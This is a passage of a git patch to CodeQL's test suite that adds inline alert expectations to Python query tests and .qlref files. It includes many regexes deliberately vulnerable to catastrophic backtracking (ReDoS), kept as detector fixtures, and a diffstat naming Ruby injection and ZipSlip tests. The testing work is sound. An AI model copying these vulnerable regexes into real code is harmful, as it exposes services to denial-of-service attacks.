re.compile(r'''(thisisagoddamnlongstringforstresstestingthequery|this\w+query)*-''') # $ Alert # GOOD good27 = re.compile(r'''(thisisagoddamnlongstringforstresstestingthequery|imanotherbutunrelatedstringcomparedtotheotherstring)*-''') # GOOD (but false positive caused by the extractor converting all four unpaired surrogates to \uFFFD) -good28 = re.compile('''foo([\uDC66\uDC67]|[\uDC68\uDC69])*foo''') +good28 = re.compile('''foo([\uDC66\uDC67]|[\uDC68\uDC69])*foo''') # $ Alert # GOOD (but false positive caused by the extractor converting all four unpaired surrogates to \uFFFD) -good29 = re.compile('''foo((\uDC66|\uDC67)|(\uDC68|\uDC69))*foo''') +good29 = re.compile('''foo((\uDC66|\uDC67)|(\uDC68|\uDC69))*foo''') # $ Alert # NOT GOOD (but cannot currently construct a prefix) -bad62 = re.compile(r'''a{2,3}(b+)+X''') +bad62 = re.compile(r'''a{2,3}(b+)+X''') # $ Alert # NOT GOOD (and a good prefix test) -bad63 = re.compile(r'''^<(\w+)((?:\s+\w+(?:\s*=\s*(?:(?:"[^"]*")|(?:'[^']*')|[^>\s]+))?)*)\s*(\/?)>''') +bad63 = re.compile(r'''^<(\w+)((?:\s+\w+(?:\s*=\s*(?:(?:"[^"]*")|(?:'[^']*')|[^>\s]+))?)*)\s*(\/?)>''') # $ Alert # GOOD good30 = re.compile(r'''(a+)*[\s\S][\s\S][\s\S]?''') # GOOD - but we fail to see that repeating the attack string ends in the "accept any" state (due to not parsing the range `[\s\S]{2,3}`). -good31 = re.compile(r'''(a+)*[\s\S]{2,3}''') +good31 = re.compile(r'''(a+)*[\s\S]{2,3}''') # $ Alert # GOOD - but we spuriously conclude that a rejecting suffix exists (due to not parsing the range `[\s\S]{2,}` when constructing the NFA). -good32 = re.compile(r'''(a+)*([\s\S]{2,}|X)$''') +good32 = re.compile(r'''(a+)*([\s\S]{2,}|X)$''') # $ Alert # GOOD good33 = re.compile(r'''(a+)*([\s\S]*|X)$''') # NOT GOOD -bad64 = re.compile(r'''((a+)*$|[\s\S]+)''') +bad64 = re.compile(r'''((a+)*$|[\s\S]+)''') # $ Alert # GOOD - but still flagged. The only change compared to the above is the order of alternatives, which we don't model. -good34 = re.compile(r'''([\s\S]+|(a+)*$)''') +good34 = re.compile(r'''([\s\S]+|(a+)*$)''') # $ Alert # GOOD good35 = re.compile(r'''((;|^)a+)+$''') # NOT GOOD (a good prefix test) -bad65 = re.compile(r'''(^|;)(0|1)(0|1)(0|1)(0|1)(0|1)(0|1)(0|1)(0|1)(0|1)(0|1)(0|1)(0|1)(0|1)(0|1)(e+)+f''') +bad65 = re.compile(r'''(^|;)(0|1)(0|1)(0|1)(0|1)(0|1)(0|1)(0|1)(0|1)(0|1)(0|1)(0|1)(0|1)(0|1)(0|1)(e+)+f''') # $ Alert # NOT GOOD -bad66 = re.compile(r'''^ab(c+)+$''') +bad66 = re.compile(r'''^ab(c+)+$''') # $ Alert # NOT GOOD -bad67 = re.compile(r'''(\d(\s+)*){20}''') +bad67 = re.compile(r'''(\d(\s+)*){20}''') # $ Alert # GOOD - but we spuriously conclude that a rejecting suffix exists. -good36 = re.compile(r'''(([^/]|X)+)(\/[\s\S]*)*$''') +good36 = re.compile(r'''(([^/]|X)+)(\/[\s\S]*)*$''') # $ Alert # GOOD - but we spuriously conclude that a rejecting suffix exists. -good37 = re.compile(r'''^((x([^Y]+)?)*(Y|$))''') +good37 = re.compile(r'''^((x([^Y]+)?)*(Y|$))''') # $ Alert # NOT GOOD -bad68 = re.compile(r'''(a*)+b''') +bad68 = re.compile(r'''(a*)+b''') # $ Alert # NOT GOOD -bad69 = re.compile(r'''foo([\w-]*)+bar''') +bad69 = re.compile(r'''foo([\w-]*)+bar''') # $ Alert # NOT GOOD -bad70 = re.compile(r'''((ab)*)+c''') +bad70 = re.compile(r'''((ab)*)+c''') # $ Alert # NOT GOOD -bad71 = re.compile(r'''(a?a?)*b''') +bad71 = re.compile(r'''(a?a?)*b''') # $ Alert # GOOD good38 = re.compile(r'''(a?)*b''') @@ -331,44 +331,44 @@ bad72 = re.compile(r'''(c?a?)*b''') # NOT GOOD -bad73 = re.compile(r'''(?:a|a?)+b''') +bad73 = re.compile(r'''(?:a|a?)+b''') # $ Alert # NOT GOOD - but not detected. bad74 = re.compile(r'''(a?b?)*$''') # NOT GOOD -bad76 = re.compile(r'''PRE(([a-c]|[c-d])T(e?e?e?e?|X))+(cTcT|cTXcTX$)''') +bad76 = re.compile(r'''PRE(([a-c]|[c-d])T(e?e?e?e?|X))+(cTcT|cTXcTX$)''') # $ Alert # NOT GOOD - but not detected -bad77 = re.compile(r'''^((a)+\w)+$''') +bad77 = re.compile(r'''^((a)+\w)+$''') # $ Alert # NOT GOOD -bad78 = re.compile(r'''^(b+.)+$''') +bad78 = re.compile(r'''^(b+.)+$''') # $ Alert # GOOD good39 = re.compile(r'''a*b''') # All 4 bad combinations of nested * and + -bad79 = re.compile(r'''(a*)*b''') -bad80 = re.compile(r'''(a+)*b''') -bad81 = re.compile(r'''(a*)+b''') -bad82 = re.compile(r'''(a+)+b''') +bad79 = re.compile(r'''(a*)*b''') # $ Alert +bad80 = re.compile(r'''(a+)*b''') # $ Alert +bad81 = re.compile(r'''(a*)+b''') # $ Alert +bad82 = re.compile(r'''(a+)+b''') # $ Alert # GOOD good40 = re.compile(r'''(a|b)+''') good41 = re.compile(r'''(?:[\s;,"'<>(){}|[\]@=+*]|:(?![/\\]))+''') # parses wrongly, sees column 42 as a char set start # NOT GOOD -bad83 = re.compile(r'''^((?:a{|-)|\w\{)+X$''') -bad84 = re.compile(r'''^((?:a{0|-)|\w\{\d)+X$''') -bad85 = re.compile(r'''^((?:a{0,|-)|\w\{\d,)+X$''') -bad86 = re.compile(r'''^((?:a{0,2|-)|\w\{\d,\d)+X$''') +bad83 = re.compile(r'''^((?:a{|-)|\w\{)+X$''') # $ Alert +bad84 = re.compile(r'''^((?:a{0|-)|\w\{\d)+X$''') # $ Alert +bad85 = re.compile(r'''^((?:a{0,|-)|\w\{\d,)+X$''') # $ Alert +bad86 = re.compile(r'''^((?:a{0,2|-)|\w\{\d,\d)+X$''') # $ Alert # GOOD: good42 = re.compile(r'''^((?:a{0,2}|-)|\w\{\d,\d\})+X$''') # NOT GOOD -bad87 = re.compile(r'X(\u0061|a)*Y') +bad87 = re.compile(r'X(\u0061|a)*Y') # $ Alert # GOOD good43 = re.compile(r'X(\u0061|b)+Y') @@ -377,17 +377,17 @@ good44 = re.compile(r'("[^"]*?"|[^"\s]+)+(?=\s*|\s*$)') # BAD -bad88 = re.compile(r'/("[^"]*?"|[^"\s]+)+(?=\s*|\s*$)X') -bad89 = re.compile(r'/("[^"]*?"|[^"\s]+)+(?=X)') +bad88 = re.compile(r'/("[^"]*?"|[^"\s]+)+(?=\s*|\s*$)X') # $ Alert +bad89 = re.compile(r'/("[^"]*?"|[^"\s]+)+(?=X)') # $ Alert # BAD -bad90 = re.compile(r'\A(\d|0)*x') -bad91 = re.compile(r'(\d|0)*\Z') -bad92 = re.compile(r'\b(\d|0)*x') +bad90 = re.compile(r'\A(\d|0)*x') # $ Alert +bad91 = re.compile(r'(\d|0)*\Z') # $ Alert +bad92 = re.compile(r'\b(\d|0)*x') # $ Alert # GOOD stress1 = re.compile(r"(? 2) - self.assertTrue(1 in [1]) - self.assertFalse(0 is "") + self.assertTrue(1 == 1) # $ Alert + self.assertFalse(1 > 2) # $ Alert + self.assertTrue(1 in [1]) # $ Alert + self.assertFalse(0 is "") # $ Alert diff --git a/python/ql/test/query-tests/Variables/general/Global.qlref b/python/ql/test/query-tests/Variables/general/Global.qlref index c20333a006e4..9b2b8470e10d 100644 --- a/python/ql/test/query-tests/Variables/general/Global.qlref +++ b/python/ql/test/query-tests/Variables/general/Global.qlref @@ -1 +1,2 @@ -Variables/Global.ql \ No newline at end of file +query: Variables/Global.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Variables/general/GlobalAtModuleLevel.qlref b/python/ql/test/query-tests/Variables/general/GlobalAtModuleLevel.qlref index f12469499b74..9c4da1043fd1 100644 --- a/python/ql/test/query-tests/Variables/general/GlobalAtModuleLevel.qlref +++ b/python/ql/test/query-tests/Variables/general/GlobalAtModuleLevel.qlref @@ -1 +1,2 @@ -Variables/GlobalAtModuleLevel.ql \ No newline at end of file +query: Variables/GlobalAtModuleLevel.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Variables/general/ShadowBuiltin.qlref b/python/ql/test/query-tests/Variables/general/ShadowBuiltin.qlref index d732a539e5ff..83d2543e7470 100644 --- a/python/ql/test/query-tests/Variables/general/ShadowBuiltin.qlref +++ b/python/ql/test/query-tests/Variables/general/ShadowBuiltin.qlref @@ -1 +1,2 @@ -Variables/ShadowBuiltin.ql +query: Variables/ShadowBuiltin.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Variables/general/ShadowGlobal.qlref b/python/ql/test/query-tests/Variables/general/ShadowGlobal.qlref index d3d632da035a..a7e7b3c4bad6 100644 --- a/python/ql/test/query-tests/Variables/general/ShadowGlobal.qlref +++ b/python/ql/test/query-tests/Variables/general/ShadowGlobal.qlref @@ -1 +1,2 @@ -Variables/ShadowGlobal.ql +query: Variables/ShadowGlobal.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Variables/general/variables_test.py b/python/ql/test/query-tests/Variables/general/variables_test.py index e623ee5244d6..8f11b9180c3b 100644 --- a/python/ql/test/query-tests/Variables/general/variables_test.py +++ b/python/ql/test/query-tests/Variables/general/variables_test.py @@ -4,14 +4,14 @@ #Shadow Builtin def sh1(x): - len = x + 2 #Shadows + len = x + 2 #Shadows # $ Alert[py/local-shadows-builtin] len = x + 0 # no shadowing warning for 2nd def return len #Shadow Global def sh2(x): - sh1 = x + 1 #Shadows + sh1 = x + 1 #Shadows # $ Alert[py/local-shadows-global] sh1 = x + 0 # no shadowing warning for 2nd def return sh1 @@ -54,14 +54,14 @@ def func(): return is_used_var2 #Redundant global declaration -global g_x +global g_x # $ Alert[py/redundant-global-declaration] g_x = 0 #Use global def uses_global(arg): - global g_x + global g_x # $ Alert[py/use-of-global] g_x = arg use(g_x) diff --git a/python/ql/test/query-tests/Variables/multiple/MultiplyDefined.qlref b/python/ql/test/query-tests/Variables/multiple/MultiplyDefined.qlref index 293098be566b..406acf779df9 100644 --- a/python/ql/test/query-tests/Variables/multiple/MultiplyDefined.qlref +++ b/python/ql/test/query-tests/Variables/multiple/MultiplyDefined.qlref @@ -1 +1,2 @@ -Variables/MultiplyDefined.ql +query: Variables/MultiplyDefined.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Variables/multiple/uselesscode_test.py b/python/ql/test/query-tests/Variables/multiple/uselesscode_test.py index 49f367d6db3e..fb3395d5806d 100644 --- a/python/ql/test/query-tests/Variables/multiple/uselesscode_test.py +++ b/python/ql/test/query-tests/Variables/multiple/uselesscode_test.py @@ -1,8 +1,8 @@ #Multiple declarations -def mult(a): - x = 1 +def mult(a): # $ Alert + x = 1 # $ Alert y = a x = 2 #Need to use x, otherwise it is ignored @@ -25,7 +25,7 @@ def _double_loop(seq): for i in seq: pass -class Mult(object): +class Mult(object): # $ Alert pass @@ -49,7 +49,7 @@ def isStr(s): # 'bad' actually *is* always redefined before being read. def have_nosmp(): try: - bad = os.environ['NPY_NOSMP'] + bad = os.environ['NPY_NOSMP'] # $ Alert bad = 1 except KeyError: bad = 0 @@ -64,7 +64,7 @@ def simple_try(foo): def try_with_else(foo): try: - bad = foo.bar + bad = foo.bar # $ Alert except AttributeError: raise else: @@ -114,7 +114,7 @@ def odasa4166(cond): def odasa5315(): x, y = foo() # OK as y is used use(y) - x, y = bar() # Not OK as neither x nor y are used. + x, y = bar() # Not OK as neither x nor y are used. # $ Alert x, y = baz() # OK as both used return x + y diff --git a/python/ql/test/query-tests/Variables/undefined/UndefinedExport.qlref b/python/ql/test/query-tests/Variables/undefined/UndefinedExport.qlref index 3e5d31e47488..d964148077e5 100644 --- a/python/ql/test/query-tests/Variables/undefined/UndefinedExport.qlref +++ b/python/ql/test/query-tests/Variables/undefined/UndefinedExport.qlref @@ -1 +1,2 @@ -Variables/UndefinedExport.ql +query: Variables/UndefinedExport.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Variables/undefined/UndefinedGlobal.py b/python/ql/test/query-tests/Variables/undefined/UndefinedGlobal.py index 0438d8e84b3c..0962a97ccfe2 100644 --- a/python/ql/test/query-tests/Variables/undefined/UndefinedGlobal.py +++ b/python/ql/test/query-tests/Variables/undefined/UndefinedGlobal.py @@ -19,12 +19,12 @@ def f(parameter): helper # Explicitly as import a # Imlicitly from ud_helper defined - ug2 # ERROR - e # ERROR Defined in ud_helper, but not in __all__ + ug2 # ERROR # $ Alert[py/undefined-global-variable] + e # ERROR Defined in ud_helper, but not in __all__ # $ Alert[py/undefined-global-variable] int float __file__ #OK all files have __file__ defined - __path__ #ERROR only modules have __path__ defined + __path__ #ERROR only modules have __path__ defined # $ Alert[py/undefined-global-variable] len #Ok defined in builtins monkey1 #Ok monkey-patched builtins @@ -120,7 +120,7 @@ def inner(): pfp3 += 1 def only_report_once(): - ug3 + ug3 # $ Alert[py/undefined-global-variable] ug3 ug3 ug3 diff --git a/python/ql/test/query-tests/Variables/undefined/UndefinedGlobal.qlref b/python/ql/test/query-tests/Variables/undefined/UndefinedGlobal.qlref index ea9f5a038426..e69631e746b9 100644 --- a/python/ql/test/query-tests/Variables/undefined/UndefinedGlobal.qlref +++ b/python/ql/test/query-tests/Variables/undefined/UndefinedGlobal.qlref @@ -1 +1,2 @@ -Variables/UndefinedGlobal.ql +query: Variables/UndefinedGlobal.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Variables/undefined/UninitializedLocal.py b/python/ql/test/query-tests/Variables/undefined/UninitializedLocal.py index 26e109af5a2a..24a09f1be336 100644 --- a/python/ql/test/query-tests/Variables/undefined/UninitializedLocal.py +++ b/python/ql/test/query-tests/Variables/undefined/UninitializedLocal.py @@ -2,7 +2,7 @@ class C: def m1(self): - y = ug1 + y = ug1 # $ Alert[py/undefined-global-variable] x = 1 return y @@ -10,16 +10,16 @@ def m2(self, p): return p def m3(self, x1): - return u2 + return u2 # $ Alert[py/uninitialized-local-variable] u2 = x1 def m4(self, x2): if x2: u3 = 1 - return u3 + return u3 # $ Alert[py/uninitialized-local-variable] def f(): - y = ug1 + y = ug1 # $ Alert[py/undefined-global-variable] x = 1 return y @@ -34,7 +34,7 @@ def h(): def j(u4): del u4 - return u4 + return u4 # $ Alert[py/uninitialized-local-variable] def k(x5): x5 + 1 @@ -43,7 +43,7 @@ def k(x5): def m(x6): if x6: u6 = 1 - u6 + u6 # $ Alert[py/uninitialized-local-variable] #The following are not uninitialized, but unreachable. u6 u6 @@ -66,13 +66,13 @@ def check_del(cond): del u8 else: pass - u8 + u8 # $ Alert[py/uninitialized-local-variable] if cond: u9 = 1 del u9 else: u9 = 2 - u9 + u9 # $ Alert[py/uninitialized-local-variable] if cond: x10 = 1 del x10 @@ -82,10 +82,10 @@ def check_del(cond): x10 u11 = 1 del u11 - u11 + u11 # $ Alert[py/uninitialized-local-variable] u12 = "hi" del u12 - del u12 + del u12 # $ Alert[py/uninitialized-local-variable] #x will always be defined. def const_range(): @@ -116,7 +116,7 @@ def use_def_conditional(cond4, cond5): u14 = 1 x16 = 2 if cond5: - return u14 + return u14 # $ Alert[py/uninitialized-local-variable] def init_and_set_flag_in_try(f): @@ -148,7 +148,7 @@ def split_not_OK(): except: cond = not False if not not cond: - return u19 + return u19 # $ Alert[py/uninitialized-local-variable] def double_is_none(x): if x is not None: @@ -160,7 +160,7 @@ def double_is_none(x): #ODASA-4241 def def_in_post_loop(seq): - j(x) + j(x) # $ Alert[py/uninitialized-local-variable] x = [] for p in seq: x = p @@ -173,9 +173,9 @@ def f(cond1, cond2): else: y = 1 if cond2: - return x + return x # $ Alert[py/uninitialized-local-variable] else: - return y + return y # $ Alert[py/uninitialized-local-variable] def needs_splitting(var): if var: diff --git a/python/ql/test/query-tests/Variables/undefined/UninitializedLocal.qlref b/python/ql/test/query-tests/Variables/undefined/UninitializedLocal.qlref index f2d0e603554a..90233ce61888 100644 --- a/python/ql/test/query-tests/Variables/undefined/UninitializedLocal.qlref +++ b/python/ql/test/query-tests/Variables/undefined/UninitializedLocal.qlref @@ -1 +1,2 @@ -Variables/UninitializedLocal.ql +query: Variables/UninitializedLocal.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Variables/undefined/decorated_exports.py b/python/ql/test/query-tests/Variables/undefined/decorated_exports.py index aad8e347909b..137807a0e004 100644 --- a/python/ql/test/query-tests/Variables/undefined/decorated_exports.py +++ b/python/ql/test/query-tests/Variables/undefined/decorated_exports.py @@ -1,16 +1,16 @@ import dotted -__all__ = ["foo", "bar", "baz", "not_defined"] +__all__ = ["foo", "bar", "baz", "not_defined"] # $ Alert[py/undefined-export] @dotted.decorator def foo(): pass -@undotted_decorator +@undotted_decorator # $ Alert[py/undefined-global-variable] def bar(): pass -@not_imported.but_dotted +@not_imported.but_dotted # $ Alert[py/undefined-global-variable] def baz(): pass diff --git a/python/ql/test/query-tests/Variables/undefined/exports.py b/python/ql/test/query-tests/Variables/undefined/exports.py index b12a501710c7..cb59cc6958d2 100644 --- a/python/ql/test/query-tests/Variables/undefined/exports.py +++ b/python/ql/test/query-tests/Variables/undefined/exports.py @@ -1,4 +1,4 @@ -__all__ = ["foo", "bar", "baz", "quux", "blat", "frob", "nosuch", "i_got_it_elsewhere"] +__all__ = ["foo", "bar", "baz", "quux", "blat", "frob", "nosuch", "i_got_it_elsewhere"] # $ Alert[py/undefined-export] with open("foo.txt") as f: foo = f.read() diff --git a/python/ql/test/query-tests/Variables/undefined/odasa3987.py b/python/ql/test/query-tests/Variables/undefined/odasa3987.py index 9c3a5fa5b2f3..43444bb80cdb 100644 --- a/python/ql/test/query-tests/Variables/undefined/odasa3987.py +++ b/python/ql/test/query-tests/Variables/undefined/odasa3987.py @@ -8,7 +8,7 @@ def f(cond1, cond2): except Exception: if cond2: var = 7 - if var == 1: + if var == 1: # $ Alert[py/uninitialized-local-variable] var = var + 1 elif var == 2: var +- 3 diff --git a/python/ql/test/query-tests/Variables/unused/SuspiciousUnusedLoopIterationVariable.qlref b/python/ql/test/query-tests/Variables/unused/SuspiciousUnusedLoopIterationVariable.qlref index 4b9f136451eb..4931ceb29e85 100644 --- a/python/ql/test/query-tests/Variables/unused/SuspiciousUnusedLoopIterationVariable.qlref +++ b/python/ql/test/query-tests/Variables/unused/SuspiciousUnusedLoopIterationVariable.qlref @@ -1 +1,2 @@ -Variables/SuspiciousUnusedLoopIterationVariable.ql \ No newline at end of file +query: Variables/SuspiciousUnusedLoopIterationVariable.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Variables/unused/UnusedLocalVariable.qlref b/python/ql/test/query-tests/Variables/unused/UnusedLocalVariable.qlref index bd6e5aaa069d..122b9d6456f6 100644 --- a/python/ql/test/query-tests/Variables/unused/UnusedLocalVariable.qlref +++ b/python/ql/test/query-tests/Variables/unused/UnusedLocalVariable.qlref @@ -1 +1,2 @@ -Variables/UnusedLocalVariable.ql +query: Variables/UnusedLocalVariable.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Variables/unused/UnusedModuleVariable.qlref b/python/ql/test/query-tests/Variables/unused/UnusedModuleVariable.qlref index 587ad9510764..8709d1bd6045 100644 --- a/python/ql/test/query-tests/Variables/unused/UnusedModuleVariable.qlref +++ b/python/ql/test/query-tests/Variables/unused/UnusedModuleVariable.qlref @@ -1 +1,2 @@ -Variables/UnusedModuleVariable.ql \ No newline at end of file +query: Variables/UnusedModuleVariable.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Variables/unused/UnusedParameter.qlref b/python/ql/test/query-tests/Variables/unused/UnusedParameter.qlref index b37e4859c1b0..1ab2f09ae4ff 100644 --- a/python/ql/test/query-tests/Variables/unused/UnusedParameter.qlref +++ b/python/ql/test/query-tests/Variables/unused/UnusedParameter.qlref @@ -1 +1,2 @@ -Variables/UnusedParameter.ql +query: Variables/UnusedParameter.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Variables/unused/test.py b/python/ql/test/query-tests/Variables/unused/test.py index 18dd2020306e..2159bf86b6e5 100644 --- a/python/ql/test/query-tests/Variables/unused/test.py +++ b/python/ql/test/query-tests/Variables/unused/test.py @@ -1,7 +1,7 @@ #Unused def fail(): - for t in [TypeA, TypeB]: + for t in [TypeA, TypeB]: # $ Alert[py/unused-loop-variable] x = TypeA() run_test(x) @@ -63,19 +63,19 @@ def OK8(seq, output): #Not OK -- Use a constant, but also a variable def fail2(sequence): for x in sequence: - for y in sequence: + for y in sequence: # $ Alert[py/unused-loop-variable] do_something(x+1) def fail3(sequence): for x in sequence: do_something(x+1) - for y in sequence: + for y in sequence: # $ Alert[py/unused-loop-variable] do_something(x+1) def fail4(coll, sequence): while coll: x = coll.pop() - for s in sequence: + for s in sequence: # $ Alert[py/unused-loop-variable] do_something(x+1) #OK See ODASA-4153 and ODASA-4533 @@ -103,7 +103,7 @@ def kwargs_is_a_use(seq): #A deletion is a use, but this is almost certainly an error def cleanup(sessions): - for sess in sessions: + for sess in sessions: # $ Alert[py/unused-loop-variable] # Original code had some comment about deleting sessions del sess diff --git a/python/ql/test/query-tests/Variables/unused/variables_test.py b/python/ql/test/query-tests/Variables/unused/variables_test.py index 611b9fbd6b2a..18be092a952e 100644 --- a/python/ql/test/query-tests/Variables/unused/variables_test.py +++ b/python/ql/test/query-tests/Variables/unused/variables_test.py @@ -22,11 +22,11 @@ #Unused parameter, local and global -def u1(x): +def u1(x): # $ Alert[py/unused-parameter] return 0 def u2(): - x = 1 + x = 1 # $ Alert[py/unused-local-variable] return 1 #These parameters are OK due to (potential overriding) @@ -45,8 +45,8 @@ def ok3(self, arg): pass #Unused module variable -not_used_var1 = 17 -not_used_var2 = 18 +not_used_var1 = 17 # $ Alert[py/unused-global-variable] +not_used_var2 = 18 # $ Alert[py/unused-global-variable] is_used_var1 = 19 is_used_var2 = 20 @@ -83,21 +83,21 @@ def f(t): # Entirely unused tuple -a,b,c = t +a,b,c = t # $ Alert[py/unused-global-variable] def f(t): - a,b,c = t + a,b,c = t # $ Alert[py/unused-local-variable] use(t) def second_def_undefined(): var = 0 use(var) - var = 1 # unused. + var = 1 # unused. # $ Alert[py/unused-local-variable] #And gloablly glob_var = 0 use(glob_var) -glob_var = 1 # unused +glob_var = 1 # unused # $ Alert[py/unused-global-variable] @@ -130,7 +130,7 @@ class C(object): #FP observed def test_dict_unpacking(queryset, field_name, value): #True positive - for tag in value.split(','): + for tag in value.split(','): # $ Alert[py/unused-loop-variable] queryset = queryset.filter(**{field_name + '__name': tag1}) return queryset #False positive diff --git a/python/ql/test/query-tests/Variables/unused_local_nonlocal/UnusedLocalVariable.qlref b/python/ql/test/query-tests/Variables/unused_local_nonlocal/UnusedLocalVariable.qlref index bd6e5aaa069d..122b9d6456f6 100644 --- a/python/ql/test/query-tests/Variables/unused_local_nonlocal/UnusedLocalVariable.qlref +++ b/python/ql/test/query-tests/Variables/unused_local_nonlocal/UnusedLocalVariable.qlref @@ -1 +1,2 @@ -Variables/UnusedLocalVariable.ql +query: Variables/UnusedLocalVariable.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Variables/unused_local_nonlocal/variables_test.py b/python/ql/test/query-tests/Variables/unused_local_nonlocal/variables_test.py index 4986a6f4eb3f..da7f7dcf7e5e 100644 --- a/python/ql/test/query-tests/Variables/unused_local_nonlocal/variables_test.py +++ b/python/ql/test/query-tests/Variables/unused_local_nonlocal/variables_test.py @@ -29,7 +29,7 @@ def not_fp(): def nonlocal_test(): nonlocal test def set_test(): - test = True + test = True # $ Alert nonlocal_test() set_test() if test: diff --git a/python/ql/test/query-tests/analysis/Consistency/Consistency.qlref b/python/ql/test/query-tests/analysis/Consistency/Consistency.qlref index 6abbdd6dd64d..0343f08ebf44 100644 --- a/python/ql/test/query-tests/analysis/Consistency/Consistency.qlref +++ b/python/ql/test/query-tests/analysis/Consistency/Consistency.qlref @@ -1 +1 @@ -analysis/Consistency.ql +query: analysis/Consistency.ql diff --git a/python/ql/test/query-tests/analysis/jump_to_defn/Definitions.qlref b/python/ql/test/query-tests/analysis/jump_to_defn/Definitions.qlref index d4e89a35c97f..cb6af4ba5b57 100644 --- a/python/ql/test/query-tests/analysis/jump_to_defn/Definitions.qlref +++ b/python/ql/test/query-tests/analysis/jump_to_defn/Definitions.qlref @@ -1 +1 @@ -analysis/Definitions.ql +query: analysis/Definitions.ql diff --git a/python/ql/test/query-tests/analysis/pointsto/FailedInference.qlref b/python/ql/test/query-tests/analysis/pointsto/FailedInference.qlref index b08adfa00b57..991e596544b2 100644 --- a/python/ql/test/query-tests/analysis/pointsto/FailedInference.qlref +++ b/python/ql/test/query-tests/analysis/pointsto/FailedInference.qlref @@ -1 +1 @@ -analysis/FailedInference.ql +query: analysis/FailedInference.ql diff --git a/python/ql/test/query-tests/analysis/pointsto/KeyPointsToFailure.qlref b/python/ql/test/query-tests/analysis/pointsto/KeyPointsToFailure.qlref index db945187917b..bd2bce681851 100644 --- a/python/ql/test/query-tests/analysis/pointsto/KeyPointsToFailure.qlref +++ b/python/ql/test/query-tests/analysis/pointsto/KeyPointsToFailure.qlref @@ -1 +1,2 @@ -analysis/KeyPointsToFailure.ql \ No newline at end of file +query: analysis/KeyPointsToFailure.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/analysis/pointsto/Pruned.qlref b/python/ql/test/query-tests/analysis/pointsto/Pruned.qlref index 2d2c28dbc261..ab448a5dfe67 100644 --- a/python/ql/test/query-tests/analysis/pointsto/Pruned.qlref +++ b/python/ql/test/query-tests/analysis/pointsto/Pruned.qlref @@ -1 +1 @@ -analysis/Pruned.ql +query: analysis/Pruned.ql diff --git a/python/ql/test/query-tests/analysis/suppression/AlertSuppression.qlref b/python/ql/test/query-tests/analysis/suppression/AlertSuppression.qlref index 9d7833eccae7..dc898fca718c 100644 --- a/python/ql/test/query-tests/analysis/suppression/AlertSuppression.qlref +++ b/python/ql/test/query-tests/analysis/suppression/AlertSuppression.qlref @@ -1 +1 @@ -AlertSuppression.ql +query: AlertSuppression.ql From 9ea3e9088c3567d4cdaadc54f36b30ffb7b65e75 Mon Sep 17 00:00:00 2001 From: Owen Mansel-Chan Date: Wed, 10 Jun 2026 22:57:52 +0200 Subject: [PATCH 06/15] Ruby --- .../dataflow/params/TypeTracker.qlref | 2 +- .../AlertSuppression/AlertSuppression.qlref | 2 +- .../query-tests/analysis/Definitions.qlref | 2 +- .../diagnostics/ExtractedFiles.qlref | 2 +- .../diagnostics/ExtractionErrors.qlref | 2 +- .../diagnostics/ExtractionWarnings.qlref | 2 +- .../NumberOfFilesExtractedWithErrors.qlref | 2 +- .../NumberOfSuccessfullyExtractedFiles.qlref | 2 +- .../DecompressionBombs.expected | 42 ++--- .../DecompressionBombs.qlref | 3 +- .../CWE-522-DecompressionBombs/gzipBombs.rb | 16 +- .../CWE-522-DecompressionBombs/zipBombs.rb | 28 +-- .../ImproperLdapAuth.expected | 6 +- .../ImproperLdapAuth/ImproperLdapAuth.qlref | 3 +- .../ImproperLdapAuth/ImproperLdapAuth.rb | 8 +- .../InsecureRandomness.expected | 4 +- .../InsecureRandomness.qlref | 3 +- .../InsecureRandomness/InsecureRandomness.rb | 2 +- .../LdapInjection/LdapInjection.rb | 12 +- .../LdapInjection/Ldapinjection.expected | 10 +- .../LdapInjection/Ldapinjection.qlref | 3 +- .../TemplateInjection/ErbInjection.rb | 6 +- .../TemplateInjection/SlimInjection.rb | 6 +- .../TemplateInjection.expected | 10 +- .../TemplateInjection/TemplateInjection.qlref | 3 +- .../XPathInjection/LibxmlInjection.rb | 6 +- .../XPathInjection/NokogiriInjection.rb | 12 +- .../XPathInjection/RexmlInjection.rb | 8 +- .../XPathInjection/XPathInjection.expected | 22 +-- .../XPathInjection/XPathInjection.qlref | 3 +- .../cwe-022-ZipSlip/ZipSlip.expected | 14 +- .../cwe-022-ZipSlip/ZipSlip.qlref | 3 +- .../experimental/cwe-022-ZipSlip/zip_slip.rb | 24 +-- .../cwe-176/UnicodeBypassValidation.qlref | 2 +- .../experimental/cwe-347/EmptyJWTSecret.qlref | 3 +- .../experimental/cwe-347/EmptyJWTSecret.rb | 4 +- .../cwe-347/MissingJWTVerification.qlref | 3 +- .../cwe-347/MissingJWTVerification.rb | 8 +- .../UnsafeYamlDeserialization.expected | 30 +-- .../cwe-502/UnsafeYamlDeserialization.qlref | 3 +- .../cwe-502/UnsafeYamlDeserialization.rb | 34 ++-- .../ManuallyCheckHttpVerb.expected | 16 +- .../ManuallyCheckHttpVerb.qlref | 3 +- .../ManuallyCheckHttpVerb.rb | 24 +-- .../weak-params/WeakParams.expected | 10 +- .../experimental/weak-params/WeakParams.qlref | 3 +- .../experimental/weak-params/WeakParams.rb | 8 +- .../query-tests/metrics/FLines/FLines.qlref | 2 +- .../metrics/FLines/FLinesOfCode.qlref | 2 +- .../metrics/FLines/FLinesOfComments.qlref | 2 +- .../performance/UseDetect/UseDetect.qlref | 3 +- .../performance/UseDetect/UseDetect.rb | 14 +- 